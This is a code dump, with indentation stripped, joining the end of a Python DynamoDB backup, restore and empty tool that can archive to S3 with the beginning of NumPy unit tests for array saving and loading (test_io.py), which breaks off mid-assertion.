if os.path.exists(args.dumpPath + os.sep + table_name):
shutil.rmtree(args.dumpPath + os.sep + table_name)
mkdir_p(args.dumpPath + os.sep + table_name)
# get table schema
logging.info("Dumping table schema for " + table_name)
f = open(args.dumpPath + os.sep + table_name + os.sep + SCHEMA_FILE, "w+")
table_desc = dynamo.describe_table(TableName=table_name)
f.write(json.dumps(table_desc, indent=JSON_INDENT))
f.close()
if not args.schemaOnly:
original_read_capacity = table_desc["Table"]["ProvisionedThroughput"][
"ReadCapacityUnits"
]
original_write_capacity = table_desc["Table"]["ProvisionedThroughput"][
"WriteCapacityUnits"
]
# override table read capacity if specified
if (
read_capacity is not None
and read_capacity != original_read_capacity
):
update_provisioned_throughput(
dynamo, table_name, read_capacity, original_write_capacity
)
# get table data
logging.info("Dumping table items for " + table_name)
mkdir_p(args.dumpPath + os.sep + table_name + os.sep + DATA_DIR)
i = 1
last_evaluated_key = None
while True:
try:
optional_args = {}
if last_evaluated_key is not None:
optional_args["ExclusiveStartKey"] = last_evaluated_key
scanned_table = dynamo.scan(
TableName=table_name, **optional_args
)
except dynamo.exceptions.ProvisionedThroughputExceededException:
logging.error(
"EXCEEDED THROUGHPUT ON TABLE "
+ table_name
+ ". BACKUP FOR IT IS USELESS."
)
tableQueue.task_done()
f = open(
args.dumpPath
+ os.sep
+ table_name
+ os.sep
+ DATA_DIR
+ os.sep
+ str(i).zfill(4)
+ ".json",
"w+",
)
del scanned_table["ResponseMetadata"]
f.write(json.dumps(scanned_table, indent=JSON_INDENT))
f.close()
i += 1
try:
last_evaluated_key = scanned_table["LastEvaluatedKey"]
except KeyError:
break
# revert back to original table read capacity if specified
if (
read_capacity is not None
and read_capacity != original_read_capacity
):
update_provisioned_throughput(
dynamo,
table_name,
original_read_capacity,
original_write_capacity,
False,
)
logging.info(
"Backup for "
+ table_name
+ " table completed. Time taken: "
+ str(datetime.datetime.now().replace(microsecond=0) - start_time)
)
tableQueue.task_done()
def prepare_provisioned_throughput_for_restore(provisioned_throughput):
"""
This function makes sure that the ProvisionedThroughput payload passed to the boto3 create_table call
is compatible, keeping only ReadCapacityUnits and WriteCapacityUnits
See: https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/dynamodb.html
"""
return {
"ReadCapacityUnits": provisioned_throughput["ReadCapacityUnits"],
"WriteCapacityUnits": provisioned_throughput["WriteCapacityUnits"],
}
def prepare_gsi_for_restore(gsi):
"""
This function makes sure that the GSI payload passed to the boto3 API call create_table is compatible with the GlobalSecondaryIndexes parameter
See: https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/dynamodb.html
"""
return {
"IndexName": gsi["IndexName"],
"KeySchema": gsi["KeySchema"],
"Projection": gsi["Projection"],
"ProvisionedThroughput": prepare_provisioned_throughput_for_restore(
gsi["ProvisionedThroughput"]
),
}
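# Illustrative sketch (hypothetical index): a GSI description taken from a schema
# dump carries extra keys (IndexStatus, IndexSizeBytes, ItemCount, and
# NumberOfDecreasesToday inside ProvisionedThroughput) that create_table rejects;
# the helper above keeps only the accepted keys.
#   gsi = {"IndexName": "by-email", "KeySchema": [...], "Projection": {...},
#          "IndexStatus": "ACTIVE",
#          "ProvisionedThroughput": {"ReadCapacityUnits": 5, "WriteCapacityUnits": 5,
#                                    "NumberOfDecreasesToday": 0}}
#   prepare_gsi_for_restore(gsi)   # -> IndexName, KeySchema, Projection, trimmed throughput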
def do_restore(dynamo, sleep_interval, source_table, destination_table, write_capacity):
"""
Restore table
"""
logging.info(
"Starting restore for " + source_table + " to " + destination_table + ".."
)
# create table using schema
# restore source_table from dump directory if it exists else try current working directory
if os.path.exists("%s/%s" % (args.dumpPath, source_table)):
dump_data_path = args.dumpPath
else:
logging.info(
'Cannot find "./%s/%s", now trying current working directory..'
% (args.dumpPath, source_table)
)
if os.path.exists("%s/%s" % (CURRENT_WORKING_DIR, source_table)):
dump_data_path = CURRENT_WORKING_DIR
else:
logging.info(
'Cannot find "%s/%s" directory containing dump files!'
% (CURRENT_WORKING_DIR, source_table)
)
sys.exit(1)
table_data = json.load(
open(dump_data_path + os.sep + source_table + os.sep + SCHEMA_FILE)
)
table = table_data["Table"]
table_attribute_definitions = table["AttributeDefinitions"]
table_table_name = destination_table
table_key_schema = table["KeySchema"]
original_read_capacity = table["ProvisionedThroughput"]["ReadCapacityUnits"]
original_write_capacity = table["ProvisionedThroughput"]["WriteCapacityUnits"]
table_local_secondary_indexes = table.get("LocalSecondaryIndexes")
table_global_secondary_indexes = table.get("GlobalSecondaryIndexes")
# override table write capacity if specified, else use RESTORE_WRITE_CAPACITY if original
# write capacity is lower
if write_capacity is None:
if original_write_capacity < RESTORE_WRITE_CAPACITY:
write_capacity = RESTORE_WRITE_CAPACITY
else:
write_capacity = original_write_capacity
if original_write_capacity == 0:
original_write_capacity = RESTORE_WRITE_CAPACITY
# ensure that read capacity is at least RESTORE_READ_CAPACITY
if original_read_capacity < RESTORE_READ_CAPACITY:
read_capacity = RESTORE_READ_CAPACITY
else:
read_capacity = original_read_capacity
if original_read_capacity == 0:
original_read_capacity = RESTORE_READ_CAPACITY
# override GSI write capacities if specified, else use RESTORE_WRITE_CAPACITY if original
# write capacity is lower
original_gsi_write_capacities = []
original_gsi_read_capacities = []
if table_global_secondary_indexes is not None:
for gsi in table_global_secondary_indexes:
# keeps track of original gsi write capacity units. If provisioned capacity is 0, set to
# RESTORE_WRITE_CAPACITY as fallback given that 0 is not allowed for write capacities
original_gsi_write_capacity = gsi["ProvisionedThroughput"][
"WriteCapacityUnits"
]
if original_gsi_write_capacity == 0:
original_gsi_write_capacity = RESTORE_WRITE_CAPACITY
original_gsi_write_capacities.append(original_gsi_write_capacity)
if gsi["ProvisionedThroughput"]["WriteCapacityUnits"] < int(write_capacity):
gsi["ProvisionedThroughput"]["WriteCapacityUnits"] = int(write_capacity)
# keeps track of original gsi read capacity units. If provisioned capacity is 0, set to
# RESTORE_READ_CAPACITY as fallback given that 0 is not allowed for read capacities
original_gsi_read_capacity = gsi["ProvisionedThroughput"][
"ReadCapacityUnits"
]
if original_gsi_read_capacity == 0:
original_gsi_read_capacity = RESTORE_READ_CAPACITY
original_gsi_read_capacities.append(original_gsi_read_capacity)
if (
gsi["ProvisionedThroughput"]["ReadCapacityUnits"]
< RESTORE_READ_CAPACITY
):
gsi["ProvisionedThroughput"][
"ReadCapacityUnits"
] = RESTORE_READ_CAPACITY
# temp provisioned throughput for restore
table_provisioned_throughput = {
"ReadCapacityUnits": int(read_capacity),
"WriteCapacityUnits": int(write_capacity),
}
if not args.dataOnly:
logging.info(
"Creating "
+ destination_table
+ " table with temp write capacity of "
+ str(write_capacity)
)
optional_args = {}
if table_local_secondary_indexes is not None:
optional_args["LocalSecondaryIndexes"] = table_local_secondary_indexes
if table_global_secondary_indexes is not None:
optional_args["GlobalSecondaryIndexes"] = [
prepare_gsi_for_restore(gsi) for gsi in table_global_secondary_indexes
]
while True:
try:
dynamo.create_table(
AttributeDefinitions=table_attribute_definitions,
TableName=table_table_name,
KeySchema=table_key_schema,
ProvisionedThroughput=table_provisioned_throughput,
**optional_args
)
break
except dynamo.exceptions.LimitExceededException:
logging.info(
"Limit exceeded, retrying creation of " + destination_table + ".."
)
time.sleep(sleep_interval)
except dynamo.exceptions.ProvisionedThroughputExceededException:
logging.info(
"Control plane limit exceeded, "
"retrying creation of " + destination_table + ".."
)
time.sleep(sleep_interval)
except dynamo.exceptions.ClientError as e:
logging.exception(e)
sys.exit(1)
# wait for table creation completion
wait_for_active_table(dynamo, destination_table, "created")
elif not args.skipThroughputUpdate:
# update provisioned capacity
if int(write_capacity) > original_write_capacity:
update_provisioned_throughput(
dynamo, destination_table, original_read_capacity, write_capacity, False
)
if not args.schemaOnly:
# read data files
logging.info("Restoring data for " + destination_table + " table..")
data_file_list = os.listdir(
dump_data_path + os.sep + source_table + os.sep + DATA_DIR + os.sep
)
data_file_list.sort()
for data_file in data_file_list:
logging.info("Processing " + data_file + " of " + destination_table)
items = []
item_data = json.load(
open(
dump_data_path
+ os.sep
+ source_table
+ os.sep
+ DATA_DIR
+ os.sep
+ data_file
)
)
items.extend(item_data["Items"])
# batch write data
put_requests = []
while len(items) > 0:
put_requests.append({"PutRequest": {"Item": items.pop(0)}})
# flush every MAX_BATCH_WRITE
if len(put_requests) == MAX_BATCH_WRITE:
logging.debug(
"Writing next "
+ str(MAX_BATCH_WRITE)
+ " items to "
+ destination_table
+ ".."
)
batch_write(
dynamo,
BATCH_WRITE_SLEEP_INTERVAL,
destination_table,
put_requests,
)
del put_requests[:]
# flush remainder
if len(put_requests) > 0:
batch_write(
dynamo, BATCH_WRITE_SLEEP_INTERVAL, destination_table, put_requests
)
if not args.skipThroughputUpdate:
# revert to original table write capacity if it has been modified
if (
int(write_capacity) != original_write_capacity
or int(read_capacity) != original_read_capacity
):
update_provisioned_throughput(
dynamo,
destination_table,
original_read_capacity,
original_write_capacity,
False,
)
# loop through each GSI to check if it has changed and update if necessary
if table_global_secondary_indexes is not None:
gsi_data = []
for gsi in table_global_secondary_indexes:
wcu = gsi["ProvisionedThroughput"]["WriteCapacityUnits"]
rcu = gsi["ProvisionedThroughput"]["ReadCapacityUnits"]
original_gsi_write_capacity = original_gsi_write_capacities.pop(0)
original_gsi_read_capacity = original_gsi_read_capacities.pop(0)
if (
original_gsi_write_capacity != wcu
or original_gsi_read_capacity != rcu
):
gsi_data.append(
{
"Update": {
"IndexName": gsi["IndexName"],
"ProvisionedThroughput": {
"ReadCapacityUnits": int(
original_gsi_read_capacity
),
"WriteCapacityUnits": int(
original_gsi_write_capacity
),
},
}
}
)
if gsi_data:
logging.info(
"Updating "
+ destination_table
+ " global secondary indexes write and read capacities as necessary.."
)
while True:
try:
dynamo.update_table(
TableName=destination_table,
GlobalSecondaryIndexUpdates=gsi_data,
)
break
except dynamo.exceptions.LimitExceededException:
logging.info(
"Limit exceeded, retrying updating throughput of"
"GlobalSecondaryIndexes in " + destination_table + ".."
)
time.sleep(sleep_interval)
except dynamo.exceptions.ProvisionedThroughputExceededException:
logging.info(
"Control plane limit exceeded, retrying updating throughput of"
"GlobalSecondaryIndexes in " + destination_table + ".."
)
time.sleep(sleep_interval)
# wait for table to become active
wait_for_active_table(dynamo, destination_table, "active")
logging.info(
"Restore for "
+ source_table
+ " to "
+ destination_table
+ " table completed. Time taken: "
+ str(datetime.datetime.now().replace(microsecond=0) - start_time)
)
else:
logging.info(
"Empty schema of "
+ source_table
+ " table created. Time taken: "
+ str(datetime.datetime.now().replace(microsecond=0) - start_time)
)
def main():
"""
Entrypoint to the script
"""
global args, sleep_interval, start_time
# parse args
parser = argparse.ArgumentParser(
description="Simple DynamoDB backup/restore/empty."
)
parser.add_argument(
"-a",
"--archive",
help="Type of compressed archive to create." "If unset, don't create archive",
choices=["zip", "tar"],
)
parser.add_argument(
"-b",
"--bucket",
help="S3 bucket in which to store or retrieve backups." "[must already exist]",
)
parser.add_argument(
"-m",
"--mode",
help="Operation to perform",
choices=["backup", "restore", "empty"],
)
parser.add_argument(
"-r",
"--region",
help="AWS region to use, e.g. 'us-west-1'. "
"Can use AWS_DEFAULT_REGION for local testing. Use '"
+ LOCAL_REGION
+ "' for local DynamoDB testing",
)
parser.add_argument(
"--host", help="Host of local DynamoDB [required only for local]"
)
parser.add_argument(
"--port", help="Port of local DynamoDB [required only for local]"
)
parser.add_argument(
"--accessKey", help="Access key of local DynamoDB " "[required only for local]"
)
parser.add_argument(
"--secretKey", help="Secret key of local DynamoDB " "[required only for local]"
)
parser.add_argument(
"-p",
"--profile",
help="AWS credentials file profile to use. Allows you to use a "
"profile instead accessKey, secretKey authentication",
)
parser.add_argument(
"-s",
"--srcTable",
help="Source DynamoDB table name to backup or restore from, "
"use 'tablename*' for wildcard prefix selection or '*' for "
"all tables. Mutually exclusive with --tag",
)
parser.add_argument(
"-d",
"--destTable",
help="Destination DynamoDB table name to backup or restore to, "
"use 'tablename*' for wildcard prefix selection "
"(defaults to use '-' separator) [optional, defaults to source]",
)
parser.add_argument(
"--prefixSeparator",
help="Specify a different prefix separator, " "e.g. '.' [optional]",
)
parser.add_argument(
"--noSeparator",
action="store_true",
help="Overrides the use of a prefix separator for backup wildcard "
"searches [optional]",
)
parser.add_argument(
"--readCapacity",
help="Change the temp read capacity of the DynamoDB table to backup "
"from [optional]",
)
parser.add_argument(
"-t",
"--tag",
help="Tag to use for identifying tables to back up. "
"Mutually exclusive with srcTable. Provided as KEY=VALUE",
)
parser.add_argument(
"--writeCapacity",
help="Change the temp write capacity of the DynamoDB table to restore "
"to [defaults to " + str(RESTORE_WRITE_CAPACITY) + ", optional]",
)
parser.add_argument(
"--schemaOnly",
action="store_true",
default=False,
help="Backup or restore the schema only. Do not backup/restore data. "
"Can be used with both backup and restore modes. Cannot be used with "
"the --dataOnly [optional]",
)
parser.add_argument(
"--dataOnly",
action="store_true",
default=False,
help="Restore data only. Do not delete/recreate schema [optional for "
"restore]",
)
parser.add_argument(
"--noConfirm",
action="store_true",
default=False,
help="Don't ask for confirmation before deleting existing schemas.",
)
parser.add_argument(
"--skipThroughputUpdate",
action="store_true",
default=False,
help="Skip updating throughput values across tables [optional]",
)
parser.add_argument(
"--dumpPath",
help="Directory to place and search for DynamoDB table "
"backups (defaults to use '" + str(DATA_DUMP) + "') [optional]",
default=str(DATA_DUMP),
)
parser.add_argument(
"--log", help="Logging level - DEBUG|INFO|WARNING|ERROR|CRITICAL " "[optional]"
)
args = parser.parse_args()
# set log level
log_level = LOG_LEVEL
if args.log is not None:
log_level = args.log.upper()
logging.basicConfig(level=getattr(logging, log_level))
# Check to make sure that --dataOnly and --schemaOnly weren't simultaneously specified
if args.schemaOnly and args.dataOnly:
logging.info("Options --schemaOnly and --dataOnly are mutually exclusive.")
sys.exit(1)
# instantiate connection
if args.region == LOCAL_REGION:
conn = _get_aws_client(
service="dynamodb",
access_key=args.accessKey,
secret_key=args.secretKey,
region=args.region,
)
sleep_interval = LOCAL_SLEEP_INTERVAL
else:
if not args.profile:
conn = _get_aws_client(
service="dynamodb",
access_key=args.accessKey,
secret_key=args.secretKey,
region=args.region,
)
sleep_interval = AWS_SLEEP_INTERVAL
else:
conn = _get_aws_client(
service="dynamodb",
profile=args.profile,
region=args.region,
)
sleep_interval = AWS_SLEEP_INTERVAL
# don't proceed if connection is not established
if not conn:
logging.info("Unable to establish connection with dynamodb")
sys.exit(1)
# set prefix separator
prefix_separator = DEFAULT_PREFIX_SEPARATOR
if args.prefixSeparator is not None:
prefix_separator = args.prefixSeparator
if args.noSeparator is True:
prefix_separator = None
# do backup/restore
start_time = datetime.datetime.now().replace(microsecond=0)
if args.mode == "backup":
matching_backup_tables = []
if args.tag:
# Use Boto3 to find tables by tag. Boto3 provides a paginator that makes searching tags straightforward.
matching_backup_tables = get_table_name_by_tag(
args.profile, args.region, args.tag
)
elif args.srcTable.find("*") != -1:
matching_backup_tables = get_table_name_matches(
conn, args.srcTable, prefix_separator
)
elif args.srcTable:
matching_backup_tables.append(args.srcTable)
if len(matching_backup_tables) == 0:
logging.info("No matching tables found. Nothing to do.")
sys.exit(0)
else:
logging.info(
"Found "
+ str(len(matching_backup_tables))
+ " table(s) in DynamoDB host to backup: "
+ ", ".join(matching_backup_tables)
)
try:
if args.srcTable.find("*") == -1:
do_backup(conn, args.read_capacity, tableQueue=None)
else:
do_backup(conn, args.read_capacity, matching_backup_tables)
except AttributeError:
# Reached via AttributeError: either srcTable was not specified or the attribute
# lookup above failed, so fall back to the threaded backup over matching tables.
q = Queue()
threads = []
for i in range(MAX_NUMBER_BACKUP_WORKERS):
t = threading.Thread(
target=do_backup,
args=(conn, args.readCapacity),
kwargs={"tableQueue": q},
)
t.start()
threads.append(t)
time.sleep(THREAD_START_DELAY)
for table in matching_backup_tables:
q.put(table)
q.join()
for i in range(MAX_NUMBER_BACKUP_WORKERS):
q.put(None)
for t in threads:
t.join()
try:
logging.info("Backup of table(s) " + args.srcTable + " completed!")
except (NameError, TypeError):
logging.info(
"Backup of table(s) "
+ ", ".join(matching_backup_tables)
+ " completed!"
)
if args.archive:
if args.tag:
for table in matching_backup_tables:
dump_path = args.dumpPath + os.sep + table
did_archive, archive_file = do_archive(args.archive, dump_path)
if args.bucket and did_archive:
do_put_bucket_object(
args.profile, args.region, args.bucket, archive_file
)
else:
did_archive, archive_file = do_archive(args.archive, args.dumpPath)
if args.bucket and did_archive:
do_put_bucket_object(
args.profile, args.region, args.bucket, archive_file
)
elif args.mode == "restore":
if args.destTable is not None:
dest_table = args.destTable
else:
dest_table = args.srcTable
# If backups are in S3 download and extract the backup to use during restoration
if args.bucket:
do_get_s3_archive(
args.profile, args.region, args.bucket, args.srcTable, args.archive
)
if dest_table.find("*") != -1:
matching_destination_tables = get_table_name_matches(
conn, dest_table, prefix_separator
)
delete_str = ": " if args.dataOnly else " to be deleted: "
logging.info(
"Found "
+ str(len(matching_destination_tables))
+ " table(s) in DynamoDB host"
+ delete_str
+ ", ".join(matching_destination_tables)
)
threads = []
for table in matching_destination_tables:
t = threading.Thread(
target=delete_table, args=(conn, sleep_interval, table)
)
threads.append(t)
t.start()
time.sleep(THREAD_START_DELAY)
for thread in threads:
thread.join()
matching_restore_tables = get_restore_table_matches(
args.srcTable, prefix_separator
)
logging.info(
"Found "
+ str(len(matching_restore_tables))
+ " table(s) in "
+ args.dumpPath
+ " to restore: "
+ ", ".join(matching_restore_tables)
)
threads = []
for source_table in matching_restore_tables:
if args.srcTable == "*":
t = threading.Thread(
target=do_restore,
args=(
conn,
sleep_interval,
source_table,
source_table,
args.writeCapacity,
),
)
else:
t = threading.Thread(
target=do_restore,
args=(
conn,
sleep_interval,
source_table,
change_prefix(
source_table,
args.srcTable,
dest_table,
prefix_separator,
),
args.writeCapacity,
),
)
threads.append(t)
t.start()
time.sleep(THREAD_START_DELAY)
for thread in threads:
thread.join()
logging.info(
"Restore of table(s) "
+ args.srcTable
+ " to "
+ dest_table
+ " completed!"
)
else:
delete_table(
conn=conn, sleep_interval=sleep_interval, table_name=dest_table
)
do_restore(
dynamo=conn,
sleep_interval=sleep_interval,
source_table=args.srcTable,
destination_table=dest_table,
write_capacity=args.writeCapacity,
)
elif args.mode == "empty":
if args.srcTable.find("*") != -1:
matching_backup_tables = get_table_name_matches(
conn, args.srcTable, prefix_separator
)
logging.info(
"Found "
+ str(len(matching_backup_tables))
+ " table(s) in DynamoDB host to empty: "
+ ", ".join(matching_backup_tables)
)
threads = []
for table in matching_backup_tables:
t = threading.Thread(target=do_empty, args=(conn, table))
threads.append(t)
t.start()
time.sleep(THREAD_START_DELAY)
for thread in threads:
thread.join()
logging.info("Empty of table(s) " + args.srcTable + " completed!")
else:
do_empty(conn, args.srcTable)
if __name__ == "__main__":
main()
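# Example invocations, assuming this script is saved as dynamodump.py (the name,
# region, table, and bucket values below are hypothetical):
#   python dynamodump.py -m backup -r us-east-1 -s 'prod*' -a tar -b my-backup-bucket
#   python dynamodump.py -m restore -r us-east-1 -s prod-users -d staging-users
#   python dynamodump.py -m empty -r us-east-1 -s staging-users --noConfirm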
test_io.py
from __future__ import division, absolute_import, print_function
import sys
import gzip
import os
import threading
import shutil
import contextlib
from tempfile import mkstemp, mkdtemp, NamedTemporaryFile
import time
import warnings
import gc
from io import BytesIO
from datetime import datetime
import numpy as np
import numpy.ma as ma
from numpy.lib._iotools import (ConverterError, ConverterLockError,
ConversionWarning)
from numpy.compat import asbytes, asbytes_nested, bytes, asstr
from nose import SkipTest
from numpy.ma.testutils import (
TestCase, assert_equal, assert_array_equal,
assert_raises, assert_raises_regex, run_module_suite
)
from numpy.testing import assert_warns, assert_, build_err_msg
@contextlib.contextmanager
def tempdir(change_dir=False):
tmpdir = mkdtemp()
yield tmpdir
shutil.rmtree(tmpdir)
class TextIO(BytesIO):
"""Helper IO class.
Writes encode strings to bytes if needed, reads return bytes.
This makes it easier to emulate files opened in binary mode
without needing to explicitly convert strings to bytes in
setting up the test data.
"""
def __init__(self, s=""):
BytesIO.__init__(self, asbytes(s))
def write(self, s):
BytesIO.write(self, asbytes(s))
def writelines(self, lines):
BytesIO.writelines(self, [asbytes(s) for s in lines])
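# Illustrative sketch of how the tests below use TextIO: str writes are encoded
# to bytes, so the buffer behaves like a file opened in binary mode.
#   c = TextIO()
#   c.write('1 2\n3 4')
#   c.seek(0)
#   c.read()   # -> b'1 2\n3 4'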
MAJVER, MINVER = sys.version_info[:2]
IS_64BIT = sys.maxsize > 2**32
def strptime(s, fmt=None):
"""This function is available in the datetime module only
from Python >= 2.5.
"""
if sys.version_info[0] >= 3:
return datetime(*time.strptime(s.decode('latin1'), fmt)[:3])
else:
return datetime(*time.strptime(s, fmt)[:3])
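# Illustrative sketch: only year/month/day from time.strptime are kept, so the
# result is a datetime at midnight.
#   strptime(b'2001-01-01', '%Y-%m-%d')   # -> datetime.datetime(2001, 1, 1, 0, 0)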
class RoundtripTest(object):
def roundtrip(self, save_func, *args, **kwargs):
"""
save_func : callable
Function used to save arrays to file.
file_on_disk : bool
If true, store the file on disk, instead of in a
string buffer.
save_kwds : dict
Parameters passed to `save_func`.
load_kwds : dict
Parameters passed to `numpy.load`.
args : tuple of arrays
Arrays stored to file.
"""
save_kwds = kwargs.get('save_kwds', {})
load_kwds = kwargs.get('load_kwds', {})
file_on_disk = kwargs.get('file_on_disk', False)
if file_on_disk:
# Do not delete the file on windows, because we can't
# reopen an already opened file on that platform, so we
# need to close the file and reopen it, implying no
# automatic deletion.
if sys.platform == 'win32' and MAJVER >= 2 and MINVER >= 6:
target_file = NamedTemporaryFile(delete=False)
else:
target_file = NamedTemporaryFile()
load_file = target_file.name
else:
target_file = BytesIO()
load_file = target_file
arr = args
save_func(target_file, *arr, **save_kwds)
target_file.flush()
target_file.seek(0)
if sys.platform == 'win32' and not isinstance(target_file, BytesIO):
target_file.close()
arr_reloaded = np.load(load_file, **load_kwds)
self.arr = arr
self.arr_reloaded = arr_reloaded
def check_roundtrips(self, a):
self.roundtrip(a)
self.roundtrip(a, file_on_disk=True)
self.roundtrip(np.asfortranarray(a))
self.roundtrip(np.asfortranarray(a), file_on_disk=True)
if a.shape[0] > 1:
# neither C nor Fortran contiguous for 2D arrays or more
self.roundtrip(np.asfortranarray(a)[1:])
self.roundtrip(np.asfortranarray(a)[1:], file_on_disk=True)
def test_array(self):
a = np.array([], float)
self.check_roundtrips(a)
a = np.array([[1, 2], [3, 4]], float)
self.check_roundtrips(a)
a = np.array([[1, 2], [3, 4]], int)
self.check_roundtrips(a)
a = np.array([[1 + 5j, 2 + 6j], [3 + 7j, 4 + 8j]], dtype=np.csingle)
self.check_roundtrips(a)
a = np.array([[1 + 5j, 2 + 6j], [3 + 7j, 4 + 8j]], dtype=np.cdouble)
self.check_roundtrips(a)
def test_array_object(self):
if sys.version_info[:2] >= (2, 7):
a = np.array([], object)
self.check_roundtrips(a)
a = np.array([[1, 2], [3, 4]], object)
self.check_roundtrips(a)
# Fails with UnpicklingError: could not find MARK on Python 2.6
def test_1D(self):
a = np.array([1, 2, 3, 4], int)
self.roundtrip(a)
@np.testing.dec.knownfailureif(sys.platform == 'win32', "Fail on Win32")
def test_mmap(self):
a = np.array([[1, 2.5], [4, 7.3]])
self.roundtrip(a, file_on_disk=True, load_kwds={'mmap_mode': 'r'})
a = np.asfortranarray([[1, 2.5], [4, 7.3]])
self.roundtrip(a, file_on_disk=True, load_kwds={'mmap_mode': 'r'})
def test_record(self):
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
self.check_roundtrips(a)
class TestSaveLoad(RoundtripTest, TestCase):
def roundtrip(self, *args, **kwargs):
RoundtripTest.roundtrip(self, np.save, *args, **kwargs)
assert_equal(self.arr[0], self.arr_reloaded)
assert_equal(self.arr[0].dtype, self.arr_reloaded.dtype)
assert_equal(self.arr[0].flags.fnc, self.arr_reloaded.flags.fnc)
class TestSavezLoad(RoundtripTest, TestCase):
def roundtrip(self, *args, **kwargs):
RoundtripTest.roundtrip(self, np.savez, *args, **kwargs)
for n, arr in enumerate(self.arr):
reloaded = self.arr_reloaded['arr_%d' % n]
assert_equal(arr, reloaded)
assert_equal(arr.dtype, reloaded.dtype)
assert_equal(arr.flags.fnc, reloaded.flags.fnc)
@np.testing.dec.skipif(not IS_64BIT, "Works only with 64bit systems")
@np.testing.dec.slow
def test_big_arrays(self):
L = (1 << 31) + 100000
a = np.empty(L, dtype=np.uint8)
with tempdir() as tmpdir:
tmp = os.path.join(tmpdir, "file.npz")
np.savez(tmp, a=a)
del a
npfile = np.load(tmp)
a = npfile['a']
npfile.close()
def test_multiple_arrays(self):
a = np.array([[1, 2], [3, 4]], float)
b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
self.roundtrip(a, b)
def test_named_arrays(self):
a = np.array([[1, 2], [3, 4]], float)
b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
c = BytesIO()
np.savez(c, file_a=a, file_b=b)
c.seek(0)
l = np.load(c)
assert_equal(a, l['file_a'])
assert_equal(b, l['file_b'])
def test_savez_filename_clashes(self):
# Test that issue #852 is fixed
# and savez functions in multithreaded environment
def writer(error_list):
fd, tmp = mkstemp(suffix='.npz')
os.close(fd)
try:
arr = np.random.randn(500, 500)
try:
np.savez(tmp, arr=arr)
except OSError as err:
error_list.append(err)
finally:
os.remove(tmp)
errors = []
threads = [threading.Thread(target=writer, args=(errors,))
for j in range(3)]
for t in threads:
t.start()
for t in threads:
t.join()
if errors:
raise AssertionError(errors)
def test_not_closing_opened_fid(self):
# Test that issue #2178 is fixed:
# verify that we can still seek on the 'loaded' file
fd, tmp = mkstemp(suffix='.npz')
os.close(fd)
try:
fp = open(tmp, 'wb')
np.savez(fp, data='LOVELY LOAD')
fp.close()
fp = open(tmp, 'rb', 10000)
fp.seek(0)
assert_(not fp.closed)
_ = np.load(fp)['data']
assert_(not fp.closed)
# must not get closed by .load(opened fp)
fp.seek(0)
assert_(not fp.closed)
finally:
fp.close()
os.remove(tmp)
def test_closing_fid(self):
# Test that issue #1517 (too many opened files) remains closed
# It might be a "weak" test since it failed to get triggered on
# e.g. Debian sid of 2012 Jul 05 but was reported to
# trigger the failure on Ubuntu 10.04:
# http://projects.scipy.org/numpy/ticket/1517#comment:2
fd, tmp = mkstemp(suffix='.npz')
os.close(fd)
try:
fp = open(tmp, 'wb')
np.savez(fp, data='LOVELY LOAD')
fp.close()
# We need to check if the garbage collector can properly close
# numpy npz file returned by np.load when their reference count
# goes to zero. Python 3 running in debug mode raises a
# ResourceWarning when file closing is left to the garbage
# collector, so we catch the warnings. Because ResourceWarning
# is unknown in Python < 3.x, we take the easy way out and
# catch all warnings.
with warnings.catch_warnings():
warnings.simplefilter("ignore")
for i in range(1, 1025):
try:
np.load(tmp)["data"]
except Exception as e:
msg = "Failed to load data from a file: %s" % e
raise AssertionError(msg)
finally:
os.remove(tmp)
def test_closing_zipfile_after_load(self):
# Check that zipfile owns file and can close it.
# This needs to pass a file name to load for the
# test.
with tempdir() as tmpdir:
fd, tmp = mkstemp(suffix='.npz', dir=tmpdir)
os.close(fd)
np.savez(tmp, lab='place holder')
data = np.load(tmp)
fp = data.zip.fp
data.close()
assert_(fp.closed)
class TestSaveTxt(TestCase):
def test_array(self):
a = np.array([[1, 2], [3, 4]], float)
fmt = "%.18e"
c = BytesIO()
np.savetxt(c, a, fmt=fmt)
c.seek(0)
assert_equal(c.readlines(),
[asbytes((fmt + ' ' + fmt + '\n') % (1, 2)),
asbytes((fmt + ' ' + fmt + '\n') % (3, 4))])
a = np.array([[1, 2], [3, 4]], int)
c = BytesIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
assert_equal(c.readlines(), [b'1 2\n', b'3 4\n'])
def test_1D(self):
a = np.array([1, 2, 3, 4], int)
c = BytesIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
lines = c.readlines()
assert_equal(lines, [b'1\n', b'2\n', b'3\n', b'4\n'])
def test_record(self):
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
c = BytesIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
assert_equal(c.readlines(), [b'1 2\n', b'3 4\n'])
def test_delimiter(self):
a = np.array([[1., 2.], [3., 4.]])
c = BytesIO()
np.savetxt(c, a, delimiter=',', fmt='%d')
c.seek(0)
assert_equal(c.readlines(), [b'1,2\n', b'3,4\n'])
def test_format(self):
a = np.array([(1, 2), (3, 4)])
c = BytesIO()
# Sequence of formats
np.savetxt(c, a, fmt=['%02d', '%3.1f'])
c.seek(0)
assert_equal(c.readlines(), [b'01 2.0\n', b'03 4.0\n'])
# A single multiformat string
c = BytesIO()
np.savetxt(c, a, fmt='%02d : %3.1f')
c.seek(0)
lines = c.readlines()
assert_equal(lines, [b'01 : 2.0\n', b'03 : 4.0\n'])
# Specify delimiter, should be overridden
c = BytesIO()
np.savetxt(c, a, fmt='%02d : %3.1f', delimiter=',')
c.seek(0)
lines = c.readlines()
assert_equal(lines, [b'01 : 2.0\n', b'03 : 4.0\n'])
# Bad fmt, should raise a ValueError
c = BytesIO()
assert_raises(ValueError, np.savetxt, c, a, fmt=99)
def test_header_footer(self):
"""
Test the functionality of the header and footer keyword argument.
"""
c = BytesIO()
a = np.array([(1, 2), (3, 4)], dtype=np.int)
test_header_footer = 'Test header / footer'
# Test the header keyword argument
np.savetxt(c, a, fmt='%1d', header=test_header_footer)
c.seek(0)
assert_equal(c.read(),
asbytes('# ' + test_header_footer + '\n1 2\n3 4\n'))
# Test the footer keyword argument
c = BytesIO()
np.savetxt(c, a, fmt='%1d', footer=test_header_footer)
c.seek(0)
assert_equal(c.read(),
